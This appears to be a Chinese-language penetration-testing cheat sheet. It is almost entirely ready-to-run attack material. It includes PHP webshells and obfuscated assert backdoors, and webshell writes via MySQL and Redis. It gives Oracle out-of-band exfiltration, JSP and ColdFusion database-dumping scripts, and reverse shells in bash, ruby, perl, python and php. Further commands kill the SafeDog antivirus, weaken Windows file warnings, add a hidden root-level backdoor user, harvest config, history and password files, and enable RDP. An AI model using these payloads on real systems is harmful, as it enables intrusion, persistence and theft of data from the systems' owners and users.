#渗透测试

PHP相关

1
2
3
4
5
6
7
8
9
10
11
<?php copy("http://x.x.x.x/shell.txt", "d:\www\shell.php"); ?>

<?php include "$_GET['_']"; ?>

<?php assert($_POST["1"]);?>

<?php
$url = "http://x.x.x.x/shell.txt";
$contents = file_get_contents($url);
echo $contents;
?>

Mysql数据库
phpmyadmin爆路径

1
http://url/phpMyAdmin/libraries/select_lang.lib.php

SQL语句导出shell:

1
select "<?php eval($_POST['1']);?>" into outfile 'C:\www\shell.php';

Redis数据库
写shell:

1
2
3
4
config set dir D:\www
config set dbfilename shell.php
set webshell "<?php eval($_POST[x]);?>"
save

Oracle数据库
查数据库ip

1
select sys_context('userenv','ip_address') from dual

通过外连回传数据

1
SELECT UTL_HTTP.request('http://target.com/getdata?data='||TABLE_NAME) FROM USER_TABLES WHERE ROWNUM<=1

查询所有表

1
SELECT * FROM ALL_TABLES

查询当前用户表

1
select table_name from user_tables;

查询所有表按大小排序

1
2
SELECT TABLE_NAME,NUM_ROWS FROM ALL_TABLES order by NUM_ROWS desc
select table_name,NUM_ROWS from user_tables order by NUM_ROWS desc

查询表前十条

1
select  *   from  users  where  rownum < 10

分页查询 2000000 到 4000000

1
SELECT * FROM (SELECT e.*,ROWNUM rn FROM (select * from user ) e WHERE ROWNUM <= 4000000) WHERE rn > 2000000

查询当前编码

1
select userenv('language') from dual;

命令行执行

1
export NLS_LANG="american_america.AL32UTF8"

拖库脚本

JSP1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<%@ page contentType="text/html;charset=UTF-8"%>
<%@ page import="java.io.*,java.lang.*,java.sql.*"%>
<%
Class.forName("oracle.jdbc.driver.OracleDriver");
Connection conn = DriverManager.getConnection("jdbc:oracle:thin:@172.0.0.1:1521:orabi", "admin", "admin");
File f = new File("/webapps/ROOT/css/t1.txt");
BufferedWriter bw = new BufferedWriter(new FileWriter(f));
Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
ResultSet rs=stmt.executeQuery("select * from member where rownum > 2000000");
ResultSetMetaData rsmd = rs.getMetaData();
int numberOfColumns = rsmd.getColumnCount();
for(int i=1;i<numberOfColumns+1;i++){
bw.write(rsmd.getColumnName(i)+",");
}
while (rs.next()){
for(int i=1;i<numberOfColumns+1;i++){
bw.write(rs.getString(i)+",");
}
bw.newLine();
bw.flush();
}
out.print(rs);
%>

JSP2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<%@ page contentType="text/html;charset=UTF-8"%>
<%@ page import="java.io.*,java.lang.*,java.sql.*"%>
<%
Class.forName("oracle.jdbc.driver.OracleDriver");
Connection conn = DriverManager.getConnection("jdbc:oracle:thin:@127.0.0.1:1521", "admin", "password");
Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
String html="";
File file = new File("/tmp/data.txt");
BufferedReader br = new BufferedReader(new FileReader(file));
String line;
while ((line = br.readLine()) != null) {
html=html+"<h3>"+line+":</h3><table border=1><tr>";
ResultSet rs=stmt.executeQuery("select * from "+line+" where rownum < 100");
ResultSetMetaData rsmd = rs.getMetaData();
int numberOfColumns = rsmd.getColumnCount();
for(int i=1;i<numberOfColumns+1;i++){
html=html+"<th>"+rsmd.getColumnName(i)+"</th>";
}
html+="</tr>";
while (rs.next()){
html+="<tr>";
for(int i=1;i<numberOfColumns+1;i++){
html=html+"<td>"+rs.getString(i)+"</td>";
}
html+="</tr>";
}
rs.close();
html+="<tr></table>";
}
File f = new File("/tmp/info.css");
BufferedWriter bw = new BufferedWriter(new FileWriter(f));
bw.write(html);
bw.close();
br.close();
stmt.close();
conn.close();
%>

ColdFusion

1
2
3
4
5
6
7
8
9
10
11
12
13
<CFSET USERNAME="user">
<CFSET PASSWORD="pass">
<CFSET DATABASE="ya_db">
<CFTRY>
<CFQUERY NAME="DATA" DATASOURCE=#DATABASE# USERNAME=#USERNAME# PASSWORD=#PASSWORD#>
SELECT * FROM MEMBER
</CFQUERY>
<CFCATCH Type="Any"></CFCATCH>
</CFTRY>
<CFSAVECONTENT variable="Dump_DATA">
<CFDUMP var="#DATA#" EXPAND="YES" FORMAT="TEXT">
</CFSAVECONTENT>
<cffile action="write" output="#Dump_DATA#" FILE="C:\\RECYCLER\\#USERNAME#_DATA.txt">

反弹shell
bash

1
bash -i >& /dev/tcp/1.1.1.1/1234 0>&1
1
rm -f /tmp/p; mknod /tmp/p p && telnet 1.1.1.1 1234 0/tmp/p

ruby

1
ruby -rsocket -e'f=TCPSocket.open("1.1.1.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

perl

1
2
3
4
perl -e 'use Socket;$i="1.1.1.1";
$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");
open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

python

1
2
3
4
5
6
7
python -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("1.1.1.1",1234));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'

php

1
php -r '$sock=fsockopen("1.1.1.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Windows取消共享文件夹安全警告

1
2
@echo off
Reg add HKCU\Software\Microsoft\Windows\CurrentVersion\PolicIEs\Associations /v LowRiskFileTypes /t REG_SZ /d .exe;.reg;.msi;.bat;.cmd;.com;.vbs;.hta;.scr;.pif;.js;.lnk; /f

kill安全狗3.x

1
ntsd -c q -pn SafeDogGuardCenter.exe

其他
python Simple HTTP服务:

1
python -m SimpleHTTPServer 

Linux相关技巧
压缩目录

1
2
3
zip  -r  root.zip  /root/*
tar -czvf root.tar.gz /root/
tar -cvf user/tmp/ooouser.tar user/ --exclude=image --exclude= --exclude *.jpg --exclude *.gif --exclude *.zip --exclude *.bmp --exclude *.eps --exclude *.psd

添加用户并设置密码

1
useradd -p `openssl passwd -1 -salt 'lsof' admin` -u 0 -o -g root -G root -s /bin/bash -d /usr/bin/lsof lsof

收集所有.sh .pl .py .conf .cnf .ini .*history .pass (/usr/share目录里面的除外) 并打包成zip

1
find / \! -path “/usr/share/*” -regex “.*\.sh$\|.*\.pl$\|.*\.py$\|.*\.conf$\|.*\.cnf$\|.*\.ini$\|.*\/\..*history$\|.*\/\..*pass.*” -print|zip pack.zip -@

array_push 后门

1
array_map("ass\x65rt",(array)$_REQUEST['array']);

开启3389端口

1
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
Your browser is out-of-date!

Update your browser to view this website correctly. Update my browser now

×